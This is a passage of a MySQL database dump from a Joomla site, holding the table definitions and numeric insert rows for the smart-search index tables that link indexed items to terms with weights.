4940,1688191,2.4),(4940,1688192,6.2668),(4940,1688193,7.7332),(4940,1688194,0.46669),(4940,1688195,1.00331),(4940,1688196,1.16669),(4940,1688334,0.37331),(4940,1688335,1.12),(4940,1688336,1.28331),(4945,1689244,1.6),(4945,1689245,6.5332),(4945,1689246,8),(4947,1689289,1.8668),(4947,1689290,6.4),(4947,1689291,7.2),(4948,1689321,5.6),(4948,1689322,6.1332),(4948,1689323,1.8668),(4948,1689324,5.4668),(4948,1689325,6.4),(4954,1689441,0.9334),(4954,1689442,3),(4954,1689443,3.3334),(4954,1689444,0.9334),(4954,1689445,2.8),(4954,1689446,3.1334),(4954,1689447,1.0668),(4954,1689448,4.9332),(4954,1689449,6.1332),(4955,1689472,2.7334),(4955,1689473,3.6),(4957,1689515,6),(4957,1689516,7.2);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms9`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms9`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms9` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms9`
--

LOCK TABLES `fw3gt_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms9` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms9` VALUES (4723,1523583,1.3334),(4764,1523583,1.3334),(4837,1523583,2.6668),(4850,1523583,2.6668),(4928,1523583,2.6668),(4951,1523583,2.6668),(4723,1523584,3),(4764,1523584,3),(4723,1523585,3.5334),(4764,1523585,3.5334),(4723,1523612,1.3334),(4764,1523612,1.3334),(4837,1523612,2.6668),(4850,1523612,2.6668),(4928,1523612,2.6668),(4951,1523612,2.6668),(4723,1523613,3.4),(4764,1523613,3.4),(4837,1523613,6.8),(4850,1523613,6.8),(4928,1523613,6.8),(4951,1523613,6.8),(4723,1523614,4),(4764,1523614,4),(4837,1523614,8),(4850,1523614,8),(4928,1523614,8),(4951,1523614,8),(4723,1523646,0.14),(4764,1523646,0.14),(4837,1523646,0.14),(4850,1523646,0.14),(4928,1523646,0.14),(4951,1523646,0.14),(4723,1523647,0.34),(4764,1523647,0.34),(4850,1523647,0.34),(4928,1523647,0.34),(4951,1523647,0.34),(4658,1523647,1.12),(4723,1523648,2.04),(4764,1523648,2.04),(4927,1523959,0.23331),(4552,1523959,0.56661),(4569,1524775,0.04669),(4572,1524775,0.04669),(4661,1524775,0.04669),(4635,1524775,0.1334),(4658,1524775,0.1334),(4759,1524775,0.1334),(4773,1524775,0.1334),(4780,1524775,0.1334),(4804,1524775,0.1334),(4571,1524775,0.14007),(4736,1524775,0.2668),(4569,1524776,1.00331),(4569,1524823,0.23331),(4571,1524823,0.23331),(4572,1524823,0.23331),(4661,1524823,0.23331),(4669,1524823,0.23331),(4749,1524823,0.23331),(4753,1524823,0.23331),(4839,1524823,0.23331),(4847,1524823,0.23331),(4851,1524823,0.23331),(4852,1524823,0.23331),(4857,1524823,0.23331),(4569,1524824,0.88669),(4569,1524825,1.00331),(4571,1524949,0.5334),(4669,1524949,0.5334),(4571,1524950,2.8),(4571,1524951,0.51331),(4571,1524962,1.00331),(4571,1524963,0.86331),(4571,1524964,1.00331),(4571,1524965,1.00331),(4571,1524966,1.14331),(4571,1524976,0.32669),(4571,1524977,0.93331),(4571,1524978,1.05),(4571,1524987,0.88669),(4572,1524987,0.88669),(4571,1524988,0.98),(4571,1524989,0.18669),(4734,1524989,0.18669),(4777,1524989,0.18669),(4917,1524989,0.18669),(4927,1524989,0.18669),(4571,1524990,0.95669),(4571,1524991,1.00331),(4571,1524999,0.28),(4571,1525000,0.88669),(4571,1525001,1.14331),(4572,1525019,1.00331),(4572,1525024,0.98),(4572,1525030,0.79992),(4661,1525030,0.79992),(4572,1525031,0.93331),(4572,1525032,1.05),(4572,1525033,2.43661),(4574,1525100,0.8),(4574,1525101,2.6666),(4767,1525168,0.68),(4762,1525183,0.09338),(4909,1525183,0.09338),(4721,1526279,0.65338),(4580,1526279,0.79339),(4591,1527331,0.6666),(4592,1527331,0.6666),(4957,1527331,0.6666),(4593,1527343,0.6666),(4593,1527408,0.68),(4593,1527409,2.66339),(4593,1527410,2.83339),(4594,1527530,0.18662),(4594,1527531,0.81669),(4594,1527532,0.88669),(4594,1527596,0.56),(4594,1527597,1.21331),(4594,1527598,1.4),(4594,1527639,0.56661),(4594,1527640,0.18669),(4594,1527641,0.88669),(4594,1527642,0.95669),(4594,1527643,0.32669),(4594,1527644,0.95669),(4594,1527645,1.21331),(4595,1527729,1.36),(4617,1528973,0.04669),(4608,1528973,0.09338),(4604,1528973,0.14007),(4625,1528973,0.14007),(4616,1528973,0.28014),(4626,1528973,0.30015),(4614,1528973,0.32683),(4624,1528973,0.32683),(4604,1528981,0.32669),(4669,1528981,0.32669),(4741,1528981,0.32669),(4616,1528981,0.65338),(4617,1528981,0.65338),(4624,1528981,0.79339),(4635,1528981,0.79339),(4931,1528981,0.79339),(4625,1528981,1.12008),(4608,1528981,2.10015),(4604,1529235,0.18669),(4608,1529235,0.18669),(4614,1529235,0.18669),(4626,1529235,0.18669),(4604,1529369,0.04669),(4616,1529369,0.04669),(4617,1529369,0.04669),(4625,1529369,0.04669),(4658,1529369,0.04669),(4614,1529369,0.09338),(4608,1529369,0.14007),(4626,1529369,0.18676),(4798,1529369,0.18676),(4624,1529369,0.28014),(4761,1529369,0.28014),(4762,1529369,0.65366),(4604,1529385,0.23331),(4608,1529385,0.23331),(4614,1529385,0.23331),(4616,1529385,0.23331),(4625,1529385,0.23331),(4626,1529385,0.23331),(4693,1529385,0.23331),(4604,1529386,0.86331),(4608,1529386,0.86331),(4614,1529386,0.86331),(4626,1529386,0.86331),(4604,1536103,0.98),(4616,1536103,0.98),(4604,1536104,1.09669),(4616,1536104,1.09669),(4604,1536105,0.91),(4604,1536106,1.05),(4604,1536107,0.95669),(4626,1536107,1.91338),(4604,1536108,1.02669),(4626,1536108,1.02669),(4604,1536109,0.37331),(4604,1536110,1.07331),(4604,1536111,1.14331),(4604,1536112,0.51331),(4604,1536113,1.02669),(4604,1536114,1.09669),(4604,1536115,0.51331),(4604,1536116,1.19),(4604,1536117,1.4),(4604,1536118,0.32669),(4604,1536119,1.21331),(4604,1536120,1.4),(4604,1536121,0.93331),(4625,1536121,0.93331),(4604,1536122,1.23669),(4625,1536122,1.23669),(4604,1536123,0.37331),(4625,1536123,0.37331),(4604,1536124,1.09669),(4625,1536124,1.09669),(4604,1536125,1.16669),(4625,1536125,1.16669),(4604,1536126,0.7),(4604,1536127,1.26),(4604,1536128,1.30669),(4604,1536129,0.7),(4604,1536130,1.12),(4604,1536131,1.4),(4604,1536132,0.37331),(4604,1536133,1.09669),(4604,1536134,1.14331),(4604,1536271,1.4),(4604,1536272,1.30669),(4604,1536273,1.4),(4604,1536274,1.33),(4604,1536275,1.4),(4604,1536276,1.4),(4604,1536277,1.4),(4604,1536278,1.4),(4604,1536279,1.14331),(4604,1536280,1.37669),(4604,1536281,0.98),(4626,1536281,0.98),(4604,1536282,1.16669),(4604,1536345,0.88669),(4614,1536345,0.88669),(4617,1536345,0.88669),(4625,1536345,0.88669),(4626,1536345,0.88669),(4604,1536346,1.16669),(4614,1536346,1.16669),(4617,1536346,1.16669),(4625,1536346,1.16669),(4626,1536346,1.16669),(4604,1536347,0.18669),(4604,1536348,1.05),(4604,1536349,1.14331),(4604,1536350,0.60669),(4604,1536351,1.28331),(4604,1536352,1.35331),(4604,1536353,0.91),(4626,1536353,0.91),(4604,1536354,0.37331),(4604,1536355,1.12),(4604,1536356,1.21331),(4604,1536357,0.28),(4625,1536357,0.28),(4626,1536357,0.28),(4604,1536358,0.93331),(4604,1536359,1.21331),(4604,1536360,0.32669),(4604,1536361,0.95669),(4604,1536362,1.21331),(4604,1536363,0.51331),(4614,1536363,0.51331),(4604,1536364,1.14331),(4614,1536364,1.14331),(4604,1536365,1.28331),(4604,1536366,0.37331),(4614,1536366,0.37331),(4927,1536366,0.37331),(4604,1536367,0.93331),(4604,1536368,1.05),(4604,1536369,0.18669),(4616,1536369,0.18669),(4617,1536369,0.18669),(4625,1536369,0.18669),(4626,1536369,0.18669),(4604,1536370,0.93331),(4617,1536370,0.93331),(4625,1536370,0.93331),(4626,1536370,0.93331),(4604,1536371,1.19),(4617,1536371,1.19),(4625,1536371,1.19),(4626,1536371,1.19),(4608,1540092,0.9334),(4608,1540093,3),(4608,1540094,3.3334),(4608,1540103,1.3334),(4614,1540103,1.3334),(4608,1540205,0.77),(4625,1540205,0.77),(4608,1540206,0.84),(4608,1540207,0.88669),(4608,1540208,1.16669),(4608,1540209,0.42),(4608,1540210,1.00331),(4608,1540211,1.21331),(4608,1540212,2.72),(4608,1540213,1.09669),(4617,1540213,1.09669),(4608,1540214,1.14331),(4608,1540215,1.07331),(4616,1540215,1.07331),(4608,1540216,1.19),(4608,1540217,2.24),(4608,1540218,2.70662),(4608,1540427,0.56),(4608,1540428,2.05338),(4608,1540429,1.23669),(4608,1540430,1.26),(4608,1540431,0.18662),(4614,1540431,0.18662),(4608,1540432,1.86662),(4614,1540432,1.86662),(4608,1540433,1.00331),(4614,1540433,1.00331),(4608,1540434,0.98),(4614,1540434,0.98),(4608,1540435,0.42),(4608,1540436,1.07331),(4608,1540437,1.21331),(4608,1540438,0.23331),(4625,1540438,0.23331),(4608,1540439,0.88669),(4608,1540440,1.05),(4608,1540441,1.02669),(4608,1540442,1.19),(4608,1540443,1.12),(4608,1540444,2.66),(4608,1540445,2.8),(4608,1540446,0.37331),(4608,1540447,1.23669),(4608,1540448,1.4),(4608,1540449,0.7),(4608,1540450,1.28331),(4608,1540451,1.4),(4608,1540553,0.81669),(4608,1540554,0.88669),(4608,1540555,0.79331),(4626,1540555,1.58662),(4608,1540556,0.86331),(4608,1540557,0.86331),(4608,1540558,1.05),(4608,1540559,0.23331),(4608,1540560,0.93331),(4608,1540561,1.00331),(4608,1540562,0.28),(4608,1540563,0.98),(4608,1540564,1.07331),(4614,1540565,0.32669),(4608,1540565,0.65338),(4608,1540566,1.86662),(4608,1540567,2.38),(4608,1540568,0.93331),(4614,1540568,0.93331),(4614,1540569,0.65331),(4608,1540569,1.30662),(4608,1540570,2.56662),(4608,1540571,2.8),(4608,1540572,0.74662),(4608,1540573,2.28662),(4608,1540574,2.75338),(4608,1540575,0.09331),(4608,1540576,0.88669),(4608,1540577,1.09669),(4608,1540578,0.84),(4608,1540579,1.96),(4608,1540580,2.28662),(4608,1540581,0.23331),(4608,1540582,0.86331),(4608,1540583,1.05),(4608,1540584,0.32669),(4608,1540585,1.05),(4608,1540586,1.4),(4608,1540587,0.23331),(4614,1540587,0.23331),(4608,1540588,0.91),(4608,1540589,1.05),(4614,1540590,0.28),(4608,1540590,0.56),(4608,1540591,0.98),(4608,1540592,1.07331),(4608,1540593,0.98),(4608,1540594,1.02669),(4614,1546234,3.2666),(4614,1546235,3.9334),(4614,1546417,0.98),(4614,1546418,1.02669),(4614,1546419,3.96655),(4614,1546420,0.84),(4614,1546421,3.82676),(4614,1546422,0.79331),(4614,1546423,0.91),(4614,1546424,0.7),(4614,1546425,1.26),(4614,1546426,1.4),(4614,1546427,0.32669),(4614,1546428,0.98),(4614,1546429,1.12),(4734,1546430,0.28),(4614,1546430,1.12),(4614,1546431,1.09669),(4614,1546432,1.14331),(4614,1546433,1.02669),(4614,1546434,1.07331),(4614,1546435,1.00331),(4614,1546436,1.12),(4614,1546437,1.02669),(4614,1546438,1.07331),(4614,1546439,0.74662),(4614,1546440,1.09669),(4614,1546441,1.35331),(4614,1546442,1.14331),(4614,1546443,1.30669),(4614,1546444,0.32669),(4614,1546445,1.05),(4614,1546446,1.14331),(4614,1546447,0.23331),(4614,1546448,0.95669),(4614,1546449,1.12),(4614,1546758,0.23331),(4839,1546758,0.23331),(4614,1546759,1.00331),(4614,1546760,1.26),(4614,1546761,0.46669),(4614,1546762,1.12),(4614,1546763,1.30669),(4614,1546764,0.42),(4614,1546765,1.16669),(4614,1546766,1.4),(4614,1546767,0.7),(4614,1546768,1.23669),(4614,1546769,1.4),(4614,1546770,1.05),(4614,1546771,1.23669),(4614,1546772,0.37331),(4614,1546773,1.05),(4614,1546774,1.09669),(4614,1546775,0.84),(4614,1546776,1.07331),(4614,1546777,1.30669),(4614,1546778,1.26),(4614,1546779,1.4),(4614,1546780,0.42),(4626,1546780,0.42),(4614,1546781,0.98),(4614,1546782,1.30669),(4614,1546946,1.00331),(4614,1546947,1.19),(4614,1546948,0.7),(4614,1546949,1.30669),(4614,1546950,1.35331),(4614,1546951,0.28),(4614,1546952,0.91),(4614,1546953,1.16669),(4614,1546954,0.7),(4614,1546955,1.30669),(4614,1546956,1.37669),(4614,1546957,0.46662),(4614,1546958,0.88669),(4614,1546959,0.95669),(4614,1546960,0.93331),(4614,1546961,1.09669),(4614,1546962,0.84),(4614,1546963,0.88669),(4614,1546964,1.16669),(4614,1546965,1.14331),(4614,1546966,1.21331),(4614,1546967,0.93331),(4614,1546968,1.12),(4614,1546969,0.46669),(4614,1546970,1.00331),(4614,1546971,1.26),(4614,1546972,0.32669),(4626,1546972,0.32669),(4614,1546973,1.00331),(4614,1546974,1.14331),(4614,1546975,0.32669),(4614,1546976,1.05),(4614,1546977,1.14331),(4614,1546978,0.95669),(4614,1546979,1.05),(4614,1546980,0.42),(4614,1546981,1.21331),(4614,1546982,1.4),(4614,1546983,0.28),(4761,1546983,0.28),(4614,1546984,1.05),(4614,1546985,1.30669),(4614,1546986,1.07331),(4614,1546987,1.12),(4614,1546988,1.21331),(4614,1546989,0.98),(4614,1546990,1.09669),(4614,1546991,0.51331),(4614,1546992,1.28331),(4614,1546993,1.4),(4614,1546994,0.23331),(4614,1546995,0.93331),(4614,1546996,1.14331),(4614,1546997,0.37331),(4614,1546998,1.14331),(4614,1546999,1.30669),(4614,1547000,0.46669),(4614,1547001,1.12),(4614,1547002,1.30669),(4614,1547003,0.65331),(4614,1547004,1.21331),(4614,1547005,1.4),(4614,1547006,0.42),(4614,1547007,1.14331),(4614,1547008,1.4),(4614,1547009,0.86331),(4614,1547010,1.02669),(4614,1547011,0.56),(4614,1547012,1.77338),(4614,1547013,2.1),(4614,1547014,1.14331),(4614,1547015,1.23669),(4625,1547792,0.77),(4616,1547792,2.31),(4616,1547793,2.45007),(4616,1547794,1.58662),(4616,1547795,1.82),(4616,1547796,0.28),(4616,1547797,1.05),(4616,1547798,1.19),(4616,1547799,0.91),(4616,1547800,1.21331),(4616,1547801,1.16669),(4616,1547802,0.23331),(4616,1547803,0.91),(4616,1547804,1.16669),(4616,1547805,0.42),(4616,1547806,1.07331),(4616,1547807,1.16669),(4616,1547808,0.23331),(4616,1547809,1.00331),(4616,1547810,1.16669),(4616,1547811,0.32669),(4616,1547812,1.02669),(4616,1547813,1.26),(4616,1547814,0.32669),(4616,1547815,1.00331),(4616,1547816,1.05),(4616,1547917,0.37331),(4616,1547918,0.93331),(4616,1547919,0.98),(4616,1547920,0.37331),(4616,1547921,1.21331),(4616,1547922,1.4),(4616,1547976,0.93331),(4616,1547977,1.00331),(4616,1547978,0.65331),(4616,1547979,1.21331),(4616,1547980,1.4),(4616,1547981,0.28),(4625,1547981,0.28),(4849,1547981,0.28),(4616,1547982,0.93331),(4616,1547983,1.16669),(4616,1547984,0.37331),(4616,1547985,1.05),(4616,1547986,1.23669),(4626,1547987,0.46669),(4616,1547987,1.13339),(4626,1547988,1.23669),(4616,1547988,3.00339),(4616,1547989,1.02669),(4625,1547989,1.02669),(4616,1547990,1.21331),(4625,1547990,1.21331),(4616,1547991,0.23331),(4616,1547992,0.86331),(4616,1547993,0.98),(4616,1547994,0.7),(4616,1547995,1.21331),(4616,1547996,1.35331),(4616,1547997,0.46669),(4616,1547998,1.07331),(4616,1547999,1.16669),(4616,1548000,0.93331),(4616,1548001,1.00331),(4617,1548274,0.98),(4617,1548275,1.07331),(4617,1548276,0.56),(4617,1548277,1.02669),(4617,1548278,1.19),(4617,1548279,1.36),(4617,1548280,2.89),(4617,1548281,1.30669),(4617,1548282,1.05),(4617,1548283,1.14331),(4617,1548284,0.28),(4617,1548285,0.98),(4617,1548286,1.05),(4617,1548362,0.32669),(4617,1548363,1.14331),(4617,1548364,1.28331),(4617,1548365,0.46669),(4625,1548365,0.46669),(4617,1548366,1.02669),(4617,1548367,1.21331),(4617,1548430,0.32669),(4617,1548431,1.05),(4617,1548432,1.28331),(4617,1548433,0.32669),(4617,1548434,0.95669),(4617,1548435,1.28331),(4624,1553891,2.56655),(4624,1553892,1.21331),(4624,1553893,1.4),(4624,1553894,1.16669),(4624,1553895,1.4),(4624,1553896,1.12),(4624,1553897,1.4),(4624,1553898,1.35331),(4624,1553899,1.4),(4624,1553900,1.16669),(4624,1553901,1.4),(4624,1553902,0.46669),(4624,1553903,1.02669),(4624,1553904,1.30669),(4624,1553905,0.32669),(4624,1553906,0.95669),(4624,1553907,1.26),(4624,1553986,0.84),(4624,1553987,1.19),(4624,1553988,1.4),(4624,1553989,1.09669),(4624,1553990,1.4),(4624,1553991,0.46669),(4624,1553992,1.02669),(4624,1553993,1.26),(4624,1553994,0.51331),(4624,1553995,1.02669),(4624,1553996,1.07331),(4624,1553997,0.37331),(4624,1553998,1.21331),(4624,1553999,1.30669),(4624,1554100,1.09669),(4624,1554101,1.30669),(4624,1554102,4.78345),(4624,1554103,2.05338),(4624,1554104,2.56662),(4624,1554105,1.16669),(4624,1554106,0.93331),(4624,1554107,1.07331),(4624,1554108,0.28),(4624,1554109,1.19),(4624,1554110,1.4),(4624,1554111,0.18669),(4624,1554112,0.88669),(4624,1554113,1.14331),(4624,1554114,0.37331),(4624,1554115,0.93331),(4624,1554116,1.05),(4624,1554117,0.65338),(4624,1554118,1.05),(4624,1554119,1.35331),(4624,1554120,1.23669),(4624,1554121,1.33),(4624,1554122,0.7),(4624,1554123,1.30669),(4624,1554124,1.4),(4624,1554125,0.37331),(4624,1554126,1.23669),(4624,1554127,1.37669),(4624,1554128,0.28),(4624,1554129,1.23669),(4624,1554130,1.4),(4624,1554308,0.46669),(4624,1554309,1.19),(4624,1554310,1.4),(4624,1554311,0.09331),(4624,1554312,0.81669),(4624,1554313,0.88669),(4624,1554314,0.42),(4624,1554315,0.95669),(4624,1554316,1.12),(4624,1554408,0.81669),(4624,1554409,1.05),(4624,1554410,0.88669),(4798,1554410,0.88669),(4624,1554411,0.93331),(4624,1554412,0.93331),(4624,1554413,1.07331),(4624,1554414,0.93331),(4624,1554415,1.07331),(4624,1554416,1.23669),(4624,1554417,1.4),(4624,1554418,0.84),(4624,1554419,1.05),(4624,1554420,0.60669),(4624,1554421,1.19),(4624,1554422,1.28331),(4624,1554423,0.37331),(4798,1554423,0.37331),(4624,1554424,1.19),(4624,1554425,1.4),(4624,1554426,0.28),(4624,1554427,0.91),(4624,1554428,1.19),(4624,1554429,0.37331),(4624,1554430,1.16669),(4624,1554431,1.37669),(4624,1554432,0.28),(4798,1554432,0.28),(4624,1554433,0.93331),(4624,1554434,0.98),(4624,1554435,0.18669),(4624,1554436,1.00331),(4624,1554437,1.05),(4624,1554438,0.23331),(4624,1554439,1.21331),(4624,1554440,1.4),(4624,1554441,0.23331),(4624,1554442,0.98),(4624,1554443,1.26),(4625,1554988,0.93331),(4625,1554989,0.93331),(4625,1554990,0.79331),(4625,1554991,1.12),(4625,1554992,0.18669),(4625,1554993,1.02669),(4625,1554994,1.14331),(4625,1554995,0.28),(4625,1554996,0.98),(4625,1554997,1.07331),(4625,1554998,0.32669),(4625,1554999,0.91),(4625,1555000,1.14331),(4625,1555001,0.23331),(4625,1555002,0.88669),(4625,1555003,1.07331),(4625,1555004,2.49339),(4625,1555005,0.28),(4777,1555005,0.28),(4625,1555006,0.98),(4625,1555007,1.07331),(4625,1555008,0.51331),(4625,1555009,1.05),(4625,1555010,1.09669),(4625,1555011,0.23331),(4917,1555011,0.69993),(4625,1555012,1.16669),(4625,1555013,1.37669),(4625,1555228,0.74662),(4625,1555229,0.93331),(4625,1555230,0.98),(4625,1555231,1.12),(4625,1555232,1.30669),(4625,1555233,1.30676),(4625,1555234,2.24),(4625,1555235,1.26),(4625,1555236,1.4),(4625,1555237,2.00662),(4625,1555238,1.23669),(4625,1555239,1.26),(4625,1555240,1.14331),(4625,1555241,1.21331),(4625,1555242,1.07331),(4625,1555243,1.21331),(4625,1555244,0.46669),(4625,1555245,1.09669),(4625,1555246,1.4),(4625,1555247,0.42),(4625,1555248,1.07331),(4625,1555249,1.23669),(4625,1555387,1.00331),(4625,1555388,1.07331),(4625,1555389,0.65338),(4625,1555390,2.14662),(4625,1555391,1.12),(4625,1555392,1.30669),(4625,1555393,1.26),(4625,1555394,1.35331),(4625,1555395,0.18669),(4625,1555396,0.86331),(4625,1555397,1.16669),(4626,1555991,1.2),(4626,1555992,0.46669),(4626,1555993,1.28331),(4626,1555994,1.4),(4626,1555995,0.65331),(4626,1555996,1.16669),(4626,1555997,1.33),(4626,1556042,0.28),(4626,1556043,0.95669),(4626,1556044,1.21331),(4626,1556045,0.14),(4626,1556046,1.14331),(4626,1556047,1.23669),(4626,1556217,2.38),(4626,1556218,2.89),(4626,1556219,0.81669),(4626,1556220,0.91),(4626,1556221,0.88669),(4626,1556222,1.19),(4626,1556223,1.14331),(4626,1556224,0.51331),(4626,1556225,1.19),(4626,1556226,1.37669),(4626,1556227,0.37331),(4626,1556228,1.02669),(4626,1556229,1.07331),(4626,1556230,0.32669),(4626,1556231,1.02669),(4626,1556232,1.07331),(4626,1556233,0.60669),(4626,1556234,1.26),(4626,1556235,1.4),(4626,1556236,0.60669),(4626,1556237,1.35331),(4626,1556238,1.4),(4626,1556239,0.28),(4626,1556240,1.21331),(4626,1556241,1.4),(4626,1556595,0.42),(4626,1556596,0.95669),(4626,1556597,1.33),(4626,1556598,1.14331),(4626,1556599,1.12),(4626,1556600,1.26),(4626,1556601,0.28),(4626,1556602,0.93331),(4626,1556603,1.00331),(4626,1556604,0.46669),(4626,1556605,1.23669),(4626,1556606,1.4),(4626,1556607,0.37331),(4626,1556608,0.95669),(4626,1556609,1.23669),(4626,1556610,0.37331),(4626,1556611,0.98),(4626,1556612,1.09669),(4626,1556715,0.81669),(4626,1556716,1.12),(4626,1556717,0.86331),(4626,1556718,0.84),(4626,1556719,0.56),(4626,1556720,1.05),(4626,1556721,1.30669),(4626,1556722,0.23331),(4626,1556723,1.09669),(4626,1556724,1.16669),(4626,1556725,0.46669),(4626,1556726,1.00331),(4626,1556727,1.26),(4626,1556728,0.23331),(4626,1556729,1.12),(4626,1556730,1.28331),(4626,1556731,1.19),(4626,1556732,1.37669),(4626,1556733,1.4),(4626,1556734,0.32669),(4653,1556734,0.79339),(4626,1556735,1.02669),(4626,1556736,1.26),(4626,1556737,0.51331),(4626,1556738,1.02669),(4626,1556739,1.33),(4626,1556740,1.05),(4626,1556741,1.23669),(4938,1556742,0.46669),(4940,1556742,0.46669),(4626,1556742,0.93338),(4626,1556743,1.09669),(4626,1556744,1.30669),(4626,1556745,1.07331),(4626,1556746,1.26),(4626,1556747,1.40007),(4626,1556748,3.99),(4626,1556749,4.2),(4626,1556750,0.46669),(4626,1556751,1.33),(4626,1556752,1.4),(4626,1556753,0.51331),(4626,1556754,1.35331),(4626,1556755,1.4),(4626,1556756,1.68),(4626,1556757,1.05),(4626,1556758,1.12),(4626,1556759,1.05),(4626,1556760,1.12),(4626,1556761,1.02669),(4626,1556762,1.09669),(4626,1556763,1.12),(4626,1556764,1.19),(4626,1556765,0.32669),(4626,1556766,1.02669),(4626,1556767,1.4),(4626,1556768,0.32669),(4626,1556769,0.91),(4626,1556770,1.19),(4635,1558504,2.6),(4635,1558513,0.37331),(4635,1558514,1.02669),(4635,1558515,1.23669),(4635,1558539,0.37331),(4635,1558540,0.98),(4635,1558541,1.26),(4669,1559036,1.00331),(4741,1559036,1.00331),(4669,1559037,1.28331),(4741,1559037,1.28331),(4653,1560615,1.0666),(4664,1560615,1.0666),(4653,1560616,3.2),(4653,1560617,3.7334),(4653,1560618,1.0666),(4653,1560619,3.0666),(4653,1560620,3.2666),(4653,1560621,0.8),(4653,1560622,2.6),(4653,1560623,3.2),(4653,1560624,1.2),(4653,1560625,2.9334),(4653,1560626,3.3334),(4653,1560627,1.3334),(4653,1560628,3.2666),(4653,1560629,3.7334),(4653,1560660,0.68),(4653,1560661,2.21),(4653,1560662,2.66339),(4734,1560701,0.84),(4653,1560701,1.02),(4653,1560702,2.72),(4653,1560703,3.00339),(4653,1560704,0.90661),(4762,1560704,0.90661),(4653,1560705,2.43661),(4762,1560705,2.43661),(4653,1560706,2.60661),(4653,1560707,2.26661),(4653,1560708,2.55),(4658,1562943,2.9334),(4658,1562944,3.4666),(4658,1562945,1.3334),(4658,1562946,3.2),(4658,1563043,0.32669),(4658,1563044,1.05),(4658,1563045,1.23669),(4693,1563046,0.32669),(4851,1563046,0.32669),(4852,1563046,0.32669),(4857,1563046,0.32669),(4678,1563046,0.79339),(4850,1563046,0.79339),(4928,1563046,0.79339),(4951,1563046,0.79339),(4658,1563046,1.12008),(4658,1563047,3.67992),(4658,1563048,3.84),(4658,1563049,0.37331),(4658,1563050,1.05),(4658,1563051,1.16669),(4761,1563052,0.23331),(4732,1563052,0.93324),(4658,1563052,1.86648),(4658,1563053,0.86331),(4732,1563053,0.86331),(4658,1563054,1.14331),(4658,1563055,0.86331),(4732,1563055,0.86331),(4658,1563056,1.14331),(4658,1563057,0.86331),(4732,1563057,0.86331),(4658,1563058,1.19),(4658,1563059,0.86331),(4732,1563059,0.86331),(4658,1563060,1.12),(4658,1563061,0.86331),(4658,1563062,1.30669),(4658,1563063,0.86331),(4658,1563064,1.16669),(4658,1563065,0.86331),(4658,1563066,1.09669),(4658,1563067,0.86331),(4658,1563068,1.16669),(4658,1563069,1.12008),(4658,1563070,1.12),(4658,1563071,1.35331),(4658,1563072,0.37331),(4658,1563073,0.95669),(4658,1563074,1.16669),(4658,1563075,4.10648),(4658,1563076,9.52),(4658,1563077,11.2),(4658,1563078,1.02669),(4658,1563079,1.16669),(4658,1563080,1.09669),(4658,1563081,1.23669),(4658,1563082,6.3),(4658,1563083,7.69986),(4658,1563107,0.88669),(4658,1563108,1.16669),(4734,1563109,1.68),(4658,1563109,2.1),(4658,1563110,5.01655),(4658,1563111,6.41655),(4658,1563112,1.30676),(4658,1563113,2.73),(4658,1563114,1.91338),(4658,1563115,0.95669),(4658,1563116,0.95669),(4658,1563117,1.23669),(4658,1563118,0.74662),(4658,1563119,1.91338),(4658,1563120,1.00331),(4658,1563121,1.00331),(4661,1563468,1.00331),(4852,1563471,0.23331),(4661,1563471,0.56661),(4839,1563471,0.56661),(4661,1563472,2.49339),(4661,1563473,2.83339),(4661,1563475,1.02669),(4661,1563476,1.09669),(4661,1563479,0.93331),(4661,1563480,1.05),(4664,1563629,2.7334),(4664,1563630,3.4666),(4664,1563631,1.0666),(4664,1563632,3),(4664,1563633,3.2),(4734,1563645,0.28),(4664,1563645,0.68),(4664,1563646,2.21),(4664,1563647,2.66339),(4734,1564394,0.14),(4669,1564754,0.93331),(4749,1564754,0.93331),(4753,1564754,0.93331),(4669,1564755,1.02669),(4734,1564926,0.28),(4734,1564940,0.18669),(4938,1564940,0.18669),(4849,1564940,0.64008),(4687,1568589,1.0666),(4687,1568595,1.2),(4687,1568596,3.2),(4693,1569299,0.32669),(4693,1569300,1.02669),(4693,1569301,1.23669),(4693,1569322,0.37331),(4693,1569323,1.07331),(4693,1569324,1.23669),(4693,1569362,1.14331),(4693,1569363,1.28331),(4693,1569364,0.37331),(4693,1569379,0.88669),(4693,1569380,1.09669),(4710,1584968,0.23331),(4721,1584968,0.23331),(4710,1584974,0.69993),(4721,1584974,1.26654),(4710,1592301,0.32669),(4710,1592302,1.21331),(4710,1592303,1.4),(4710,1592304,0.28),(4710,1592305,1.00331),(4710,1592306,1.12),(4710,1592307,0.46669),(4710,1592308,1.02669),(4710,1592309,1.28331),(4710,1592473,0.42),(4710,1592474,0.95669),(4710,1592475,1.21331),(4710,1592476,0.46669),(4710,1592477,1.05),(4710,1592478,1.35331),(4710,1592479,0.46669),(4710,1592480,1.05),(4710,1592481,1.12),(4710,1592482,0.37331),(4710,1592483,0.98),(4710,1592484,1.19),(4710,1592485,0.32669),(4734,1592485,0.32669),(4710,1592486,0.91),(4710,1592487,1.21331),(4710,1592488,0.28),(4940,1592488,0.28),(4710,1592489,1.05),(4710,1592490,1.28331),(4710,1592491,0.37331),(4710,1592492,1.02669),(4710,1592493,1.16669),(4710,1592568,0.91),(4710,1592569,1.05),(4710,1592570,1.09669),(4710,1592571,1.26),(4710,1592572,1.02669),(4710,1592573,1.16669),(4710,1592574,1.05),(4710,1592575,1.09669),(4710,1592576,0.28),(4710,1592577,1.07331),(4710,1592578,1.26),(4710,1592579,0.95669),(4710,1592580,1.05),(4710,1592581,0.51331),(4710,1592582,1.07331),(4710,1592583,1.30669),(4710,1592584,0.46669),(4710,1592585,1.16669),(4710,1592586,1.23669),(4710,1592587,0.37331),(4710,1592588,1.12),(4710,1592589,1.19),(4710,1592590,0.37331),(4710,1592591,0.95669),(4710,1592592,1.19),(4710,159259